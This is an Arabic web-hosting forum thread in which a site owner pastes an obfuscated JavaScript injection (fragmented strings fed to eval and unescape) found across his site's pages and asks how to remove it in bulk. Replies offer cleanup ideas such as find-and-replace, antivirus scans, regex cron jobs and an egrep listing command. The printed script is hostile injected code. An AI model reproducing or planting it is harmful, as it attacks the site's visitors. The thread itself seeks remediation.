كود خبيث ينتشر فجأه في موقعي لكن طريقة انتشاره غريبة للغايه

[amawi]

بسم الله الرحمن الرحيم

مرحبا جميعا

في موقع مجلة الجيل الواعد
www.al-jeel.net

والذي توقفت عن متابعته منذ قرابة 8 اشهر او يزيد

لاحظت في الفتره الاخيره ان جوجل يصنفه على انه موقع مشكوك به ..

والسبب كما اكتشفت لاحقا هو هذا الكود الذي ينتشر في كل صفحات الموقع بلا استثناء ..
سواء php أو html

كود:

<SCRIPT>var Pcvcc07h="4%9wQ74%";var fpR7kE="848%847%851%84";var Dv9L9eSP="5%wiIHJ49%HJ6D";var Vtklbr="874%865%82";var OT3LphCq="%9wQ27%";var ILDnpX="e(eqAL";var MePqurl="%rk827%rk83";var mKo9ksYL="46BO2E";var Yr6gqlaF="875%86C%8";var FKawUvR="Q2F%9wQ";var v5pWM="56%82Y4";var CgPqdy="3D%864%8";var tbLh="6D%865";var OkvV1pFt="76%rk82E%rk8";var IpIJPTeA="35%9wQ33%9wQ";IpIJPTeA="63%9wQ70%9wQ"+IpIJPTeA;var qdDxcK="5%853%856%82B%";var XzU5="5b871%827%82Y4";var Yux9QGKs="9wQ76%9wQ2E%9wQ";var y9ukC4MP="lace(/Y4/g";var bo4AOMZS="5%rk833%rk";var muMe7="D%9wQ27%9w";MePqurl="827%rk831"+MePqurl;var Q65nmqMz="Q3D%9w";var bWVve="65%9wQ6D%9wQ6F%";var CMT3Z9="%865%86E%874%";var zxMu="wQ69%9wQ64%9w";var YRiS6V0="2%86F%864%87";var QQB2="var LxjPx='%r";var oABfY1s="%9wQ33%9wQ7";v5pWM+="83B%876%86";var UKjyne1="6%83D%82";muMe7=zxMu+"Q74%9wQ68%9wQ3"+muMe7;var H7QR0DE4="g,'4%').replace";OkvV1pFt+="68%rk865%rk8";Vtklbr+="0%828%8";var SXzS2xPQ="6D%865%86E%874";var dt8uT2oA="ce(/b/g,'A";var davHPf1="6F%863%875%8";var kZsdZy="3E%HJ3C%";QQB2="/g,'%')));"+QQB2;SXzS2xPQ="4%845%86C%865%8"+SXzS2xPQ;var KFOo="O70BO5ABO";var uZzjFA="J32%HJ45%H";var j162F="EBO61BO6DBO";var a1LIt4="7Y483D%83";var cqkST="O64BO43B";var HYrkR="8BO47BO51B";var MvrJdOP="nescape(whJj";var EzVjeKs="Q75%9wQ69%";EzVjeKs+="9wQ74%";var XrotdC="5%86E%874%";var T3JxYi2="BO69BO73BO69";YRiS6V0=qdDxcK+"827%83C%82F%86"+YRiS6V0;kZsdZy="J71%HJ27%HJ"+kZsdZy;var CsE65="%828%864%8";var Vu20="%')));";bWVve+="9wQ6E%9wQ69%9wQ";var FK4sZn="2%HJ3C%HJ6vHJ6";var vyn1QQj="CBO5ABO6CBO";MvrJdOP="22%HJ3B';eval(u"+MvrJdOP;HYrkR="3BBO4FBO4"+HYrkR;dt8uT2oA=y9ukC4MP+",'9%').repla"+dt8uT2oA;var XowC0I="77%858%84Y";cqkST+="O68BO69BO";var DGqoJ="rk8/g,'%')";CsE65="='%86Y4866"+CsE65;var ZPFNF="val(unescape";var qTNAUH="2E%9wQ";CgPqdy+="6F%863%";var YV1YC="J/g,'%')));var";Pcvcc07h+="9wQ70%";Yux9QGKs+="73%9wQ";var tlXAD="6%HJ61%HJ72%H";YRiS6V0+="Y483E%8";var IV3oCeZB="eqAL='%9wQ63%";QQB2+="k863%r";var oLoklFQn="%833%8";mKo9ksYL=HYrkR+"O42BO5ABO4ABO"+mKo9ksYL;fpR7kE+="2%85b8";kZsdZy+="HJ2F%HJ6vHJ69";oABfY1s=IV3oCeZB+"9wQ70%9wQ35"+oABfY1s;YRiS6V0="86D%86C%842%86"+YRiS6V0;XzU5+="83B%876%861%";var KKkTi="874%82E%877";var DOkvQdkj="scape(LxjPx.rep";MvrJdOP=kZsdZy+"%HJ76%HJ3E%HJ"+MvrJdOP;var YCao7rjk="ABO44BO7";DOkvQdkj=MePqurl+"B';eval(une"+DOkvQdkj;uZzjFA="HJ77%H"+uZzjFA;MvrJdOP="7%wiIHJ5A%H"+MvrJdOP;FKawUvR+="2F%9wQ6";Vtklbr=KKkTi+"%872%86Y4"+Vtklbr;EzVjeKs=FKawUvR+"6%9wQ72%9w"+EzVjeKs;UKjyne1+="7%83C%862%";var wO1LJ3u2="%872%861%8";davHPf1=YRiS6V0+"27%83B%864%8"+davHPf1;Dv9L9eSP="%HJ27%HJ77%HJ"+Dv9L9eSP;qTNAUH+="77%9wQ7";var Eh9mSW="832%845%8";var FPPbCY="HJ6C%HJ42%HJ6";ZPFNF="82Y483B';e"+ZPFNF;Vu20="ace(/BO/g,'"+Vu20;FK4sZn+="9%HJ76%HJ2";vyn1QQj+="45BO42BO56BO6";var fUTUV4="0BO35BO33BO7";fUTUV4+="0BO5AB";FPPbCY+="5%HJ53%HJ56%H";CMT3Z9+="82E%862%86";YV1YC="place(/%H"+YV1YC;SXzS2xPQ+="%842%87Y484Y";Q65nmqMz=Yux9QGKs+"72%9wQ63%9w"+Q65nmqMz;CMT3Z9=CsE65+"6F%863%875%86D"+CMT3Z9;oABfY1s="')));var "+oABfY1s;XzU5=Eh9mSW+"42%878%8"+XzU5;Pcvcc07h=Q65nmqMz+"Q27%9wQ68%9wQ7"+Pcvcc07h;var eH2B="BO64BO64BO65B";vyn1QQj+="7BO58BO69B";UKjyne1+="86F%864%";davHPf1="27%82B%"+davHPf1;Pcvcc07h=oABfY1s+"0%9wQ5A%9wQ44%"+Pcvcc07h;Vu20="ape(wvzZ.repl"+Vu20;v5pWM="65%853%8"+v5pWM;a1LIt4=CMT3Z9+"F%864%8"+a1LIt4;tbLh+="%86E%874%82E%86";YV1YC="'8%').re"+YV1YC;bo4AOMZS=QQB2+"k870%rk83"+bo4AOMZS;OkvV1pFt="A%rk844%rk8"+OkvV1pFt;var eqrA="%842%8";davHPf1=UKjyne1+"87Y483E%8"+davHPf1;Dv9L9eSP=FK4sZn+"0%HJ69%HJ6vHJ3D"+Dv9L9eSP;MvrJdOP=uZzjFA+"J42%HJ"+MvrJdOP;var XRxZe="O2EBO7";tbLh="86F%863%875%8"+tbLh;XRxZe=fUTUV4+"O44BO76B"+XRxZe;OkvV1pFt+="69%rk867%";var XYJGT="BO63BO70B";XYJGT=DGqoJ+"));var wvzZ='"+XYJGT;dt8uT2oA+="%').replace";ZPFNF=wO1LJ3u2+"6D%865%827%"+ZPFNF;var rJGrvuZ="74%865%845%86C%";CgPqdy+="875%86D%";ZPFNF+="(m2tnRv";var HrAM="27%9wQ3B';";XzU5+="872%820%863";IpIJPTeA=OT3LphCq+"9wQ3B%9wQ"+IpIJPTeA;EzVjeKs=Pcvcc07h+"9wQ3A%9w"+EzVjeKs;XzU5=XowC0I+"486D%871%877%"+XzU5;EzVjeKs=dt8uT2oA+"(/%8/g,'%"+EzVjeKs;OkvV1pFt+="rk868%rk87";cqkST+="6CBO64BO28BO";HrAM=muMe7+"Q31%9wQ"+HrAM;EzVjeKs+="9wQ73%9w";var YA4mh="6CBO69BO";OkvV1pFt=bo4AOMZS+"870%rk85"+OkvV1pFt;YA4mh+="74BO79BO3DB";YA4mh=T3JxYi2+"BO62BO69BO"+YA4mh;FPPbCY=tlXAD+"J20%HJ6D%"+FPPbCY;ZPFNF=XrotdC+"828%827%86Y4866"+ZPFNF;eqrA=Yr6gqlaF+"6C%82Y486D%86C"+eqrA;var WmfJ="44%876%83";FPPbCY="var whJju='%HJ7"+FPPbCY;CgPqdy=fpR7kE+"4b846%8"+CgPqdy;qTNAUH=bWVve+"61%9wQ"+qTNAUH;XzU5=SXzS2xPQ+"4864%828%827%8"+XzU5;IpIJPTeA="Q54%9wQ62%9wQ6C"+IpIJPTeA;KFOo+="44BO76BO29BO";YA4mh="65BO2EBO76"+YA4mh;cqkST="5BO6EB"+cqkST;a1LIt4=YV1YC+" m2tnRvXx"+a1LIt4;HrAM="%9wQ2E%9wQ77%9"+HrAM;j162F=YCao7rjk+"6BO2EBO6"+j162F;j162F=XYJGT+"O35BO33BO70BO5"+j162F;IpIJPTeA=qTNAUH+"3%9wQ2F%9w"+IpIJPTeA;Vtklbr=davHPf1+"6D%865%86E%"+Vtklbr;ILDnpX=HrAM+"eval(unescap"+ILDnpX;IpIJPTeA+="70%9wQ5";EzVjeKs=ZPFNF+"Xx.rep"+EzVjeKs;cqkST=mKo9ksYL+"BO61BO70BO70BO6"+cqkST;CgPqdy+="865%86E%874%82E";Vu20=KFOo+"3B';eval(unesc"+Vu20;Dv9L9eSP=FPPbCY+"J3D%HJ2"+Dv9L9eSP;WmfJ=oLoklFQn+"70%85b8"+WmfJ;ILDnpX=IpIJPTeA+"A%9wQ44%9wQ76"+ILDnpX;cqkST=eH2B+"O6EBO27BO"+cqkST;vyn1QQj=j162F+"65BO3DBO27BO6"+vyn1QQj;ILDnpX=EzVjeKs+"Q2E%9wQ6C%9wQ"+ILDnpX;OkvV1pFt=ILDnpX+".replace(/%9wQ"+OkvV1pFt;Vu20=cqkST+"63BO70BO35BO33B"+Vu20;H7QR0DE4=MvrJdOP+"u.replace(/v/"+H7QR0DE4;DOkvQdkj=OkvV1pFt+"4%rk83D%rk"+DOkvQdkj;vyn1QQj=DOkvQdkj+"lace(/%"+vyn1QQj;v5pWM=Vtklbr+"6D%86C%842%8"+v5pWM;XRxZe=vyn1QQj+"O27BO3BBO63BO7"+XRxZe;tbLh=WmfJ+"D%864%"+tbLh;YA4mh=XRxZe+"3BO74BO79BO6CBO"+YA4mh;v5pWM=eqrA+"65%853%85"+v5pWM;rJGrvuZ=tbLh+"3%872%865%861%8"+rJGrvuZ;CgPqdy=v5pWM+"1%872%820%84F%"+CgPqdy;a1LIt4=H7QR0DE4+"(/%wiI/g,"+a1LIt4;CgPqdy=a1LIt4+"D%86E%"+CgPqdy;YA4mh=rJGrvuZ+"865%86D%86"+YA4mh;CgPqdy=Dv9L9eSP+"%HJ71%"+CgPqdy;YA4mh=XzU5+"%870%835"+YA4mh;Vu20=YA4mh+"O27BO68BO69"+Vu20;Vu20=CgPqdy+"%867%865%87"+Vu20;eval(Vu20);</SCRIPT>

وبما ان جهازي انا نظيف من الفايروسات
فالسبب كما اعتقد هو جهاز الاستضافه كوني فوضتهم سابقا بوضع بعض الاعلانات في موقعي

ما يهمني الآن هو ان صفحات الموقع كثيره للغاية
فانا استخدم جملا باحد اصداراتها القديمه
ومنتديات الاي بي باحد اصداراتها القديمه ايضا
وسكربت رفع صور
وسكربت الالعاب
... الخ

والمقدر ان عدد صفحات الموقع ستزيد عن 100 الف صفحه حيث لن استطيع تنظيفها بشكل يدوي

فهل هناك طريقه لتنظيفها دفعة واحده ؟
او هل هناك طريقه يمكنن بها تعطيل عمل هذا الكود اينما ورد ؟؟

مثلا ملف .htaccess يمكنني من خلاله حذف هذا الكود او تعطيل عمله
او حتى جعله كتوضيع في صفحات php
وذلك من خلال
<-- --!>
او من خلال
//

لا ادري

بحاجه لمشورتكم ^_^
ومستعد لوضع اعلان بنر او نص لمده شهرين لمن يأتي بالحل ^_^

خالص الاحترام ^_^

[عبد الله هُربي]

الحل بيد الإستضافة ايضاً .. من خلال كود SSH وينتهي الأمر ان شاء الله ..

والله أعلم ..

[أيمن عبدالله]

مفيش حل غير انك تنقل الملفات على جهازك وتعملها سكان وترجع تنقلها تانى لموقعك

[amawi]

اخ مجاهد .. هل هناك صيغة مبدئية للكود ؟
شكرا جزيلا عموما ^_^
==========

اخ سيف مسلول .. مسأله نقل الملفات الى جهازي شبه مستحيله ^_^
على فرض انني نقلتها وهي كما قلت تزيد عن 100 الف ملف
فكيف ساعدل عليها دفعة واحده ؟
هل هذا ممكن ؟
اعملها سكان كيف ؟
هل هناك برنامج مكافحة فايروسات يحذف اكواد من الصفحه ؟

[عادل الظفيري]

اموي انت صارت المشكلة معاك قبل كم شهر اتذكر وفي موضوع من مواضيعك عرضت عليك المساعدة

الحل بسيط الكود موجود في صفحات الاندكس والكونفق فقط

يعني الصفحات الثاني مو موجود فيها

واي مساعدة راسلني عن طريق سوالف

[أيمن عبدالله]

برنامج الكاسبرسكى يفحصها كلها حتى لو اخذت وقت طويل ، ولكنه سيحدد لك الملفات المعطوبه

[محمد صبري]

اكتب كود ريجولر اكسبرشن يبحث و يزيل المحتوى اللى انته عايزو و شغلو ولو الفيرس دا لسه مش معروفلو حل
الكود اللى هتكتبو دا خليه كورن جوب يشتغل كل فترة يعمل سكان و ينظف لوحدو الصفحات لغايه ما تلاقى حل

[خالد الحربي]

تفضل
طريقة ازالة فيروس ifream او الاكواد الخبيثة من موقعك - سوالف سوفت

[amawi]

شكرا لك اخ عادل وتم مراسلتك ^_^
=============

اخ سيف مسلول
جربت انزال بعض الملفات المضروبه الى الجهاز
لكن للاسف الكاسبر انترنت سيكيورتي لم يصنف هذا الكود على انه فايروس -_-
===============

اخ محمد صبري
المشكله ان هذا الكود تحده في هيئة جديده ضمن كل ملف !!!

===============

اخ سيكرت ..
الكاسبر انترنت سيكروتي لم يجد
والملف المرفق في الموضوع ايضا لم يجد -_-

[eslamspot]

السلام عليكم
طبعا فى حلول سهلة و سريعة مهما كان حجم موقعك و كمية الملفات المتضررة
اولا فى طريقة على الوندوز و طريقى من على اللنكس اى من على ssh
الطريقة الاول من على الوندوز تنزل محتوى الموقع بتاعك كلة و تفتح برنامج دريم ويفر هتلاقى اداة اسمة find and replace
و دة مش هتحددلة ملف لا هتحدد الفولدر كلة
دة الحل الاول الحل التانى بقى من على الترمنل او الشل بس لازم يكون معاك صلاحية ssh على السيرفر على حسابك على الاقل مش على كل السيرفر لو عندك قولى و انا اديك الحل لو انى عارف انى تقريبا مفيش شركة استضافة عربية:funny: الا القليل الى بتفتح الخاصية دة على الاستضافة للعملاء
ولاكن نحن نختلف عن الاخرين احنا بنسمح للعملاء بامتلاك ssh
جرب و قولى وصلت لاية و ان شاء الله خير

[amawi]

السلام عليكم
طبعا فى حلول سهلة و سريعة مهما كان حجم موقعك و كمية الملفات المتضررة
اولا فى طريقة على الوندوز و طريقى من على اللنكس اى من على ssh
الطريقة الاول من على الوندوز تنزل محتوى الموقع بتاعك كلة و تفتح برنامج دريم ويفر هتلاقى اداة اسمة find and replace
و دة مش هتحددلة ملف لا هتحدد الفولدر كلة
دة الحل الاول الحل التانى بقى من على الترمنل او الشل بس لازم يكون معاك صلاحية ssh على السيرفر على حسابك على الاقل مش على كل السيرفر لو عندك قولى و انا اديك الحل لو انى عارف انى تقريبا مفيش شركة استضافة عربية:funny: الا القليل الى بتفتح الخاصية دة على الاستضافة للعملاء
ولاكن نحن نختلف عن الاخرين احنا بنسمح للعملاء بامتلاك ssh
جرب و قولى وصلت لاية و ان شاء الله خير

شكرا لردك اخي الكريم ^_^

بخصوص الطريقه الأولى ..
هناك مشكله في ان الكود ثابت في شكله في كل الصفحات
لكن القيم المدخله به متغيره في كل صفحه :anger2:
فما الحل برأيك ؟

============
الطريقه الثانيه للاسف استضافتي لا تتيح هذا الامر :nice:

[cash-money]

الكو دة عبارة عن (فايروس) يصيب ملفات index و login فقط

سواء كانت php أو html

المشكلة ليست من استضافة عربية أو غيرها .. لا ..

أنا موقعي على استضافة أجنبية قوية وهي Host Monster .. و مع ذلك أصيبت بعض ملفات موقعي به .. بس أنا أزلت الكود عن الملفات المصابة


أخوكم/
إسلام الأشقر

[SaBLeH]

اعط تصريح 444

[khashabawy]

Http://crazy-eng.com/demagh/t11175.html

[eslamspot]

السلام عليكم
انا لم اقل ان الاستضافة العربية هى السبب انا اقول ان الاستضافة العربية لا تسمح ب ssh
طيب انا هديلك حل تانى و انت اطلب من مدير السيرفر يساعدك فية
يدخل من على ال ssh و ينفذ هذة الاوامر

كود:

egrep "bad code" /home/EslamSpot   -R  >> /home/eslamspot/badfilelist.txt


chown  eslamspot:eslamspot /home/eslamspot/badfilelist.txt

احذف كلمة bad cod و ضع بدلة الكود الثابت من الكود الخبيث

و استبدل كلمة eslamspot باسم المستخدم الخاص بك

و بعد كدة انت بقى ادخل على لوحة التحكم هتلاقى ملف اسمة badfilelist.txt فى الفولدر الرئيسى للموقع الخاص بك هتلاقى فى كل الملفات المصابة
و ربنا يعينك بقى على الحذف